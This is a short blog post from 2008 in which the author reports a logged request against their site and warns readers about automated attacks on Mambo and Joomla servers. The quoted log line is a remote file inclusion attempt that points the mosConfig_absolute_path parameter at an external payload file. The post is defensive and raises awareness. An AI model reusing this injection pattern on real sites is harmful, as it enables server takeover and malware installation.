Vector of compromise: mosConfig_absolute_path

While reviewing my logs for recent hits on my blog I came across the following request:

 URL: http://robotterror.com/site/wiki/mosConfig_absolute_path%3Dhttp%3A/[...]/f1.txt
 Date: Monday, January 28, 2008 - 05:59
 Remote Host: 69.57.148.17

Fortunately I am not using Mambo or Joomla (though the blog-ware I am using has its own troubles) or I would have been infected with malware that would turn my server into an attack platform for DDoS attacks, spam, IRC, phishing scams and a host of illegal content of all kinds.

So, let me ask you: is your server able to survive such an automated attack as this? Is it already serving illegal purposes?

Reply

  • You can use Mediawiki syntax. It is possible that not all formatting options are supported at the moment.
    Links to other pages: [[Page Title]] or [[path/to/page|Title]].
    External links: http://example.com or [http://example.com some link title].
    Interwiki links: [[site:Page Title]].
    You can use the following interwiki links: path, gdo, wp

More information about formatting options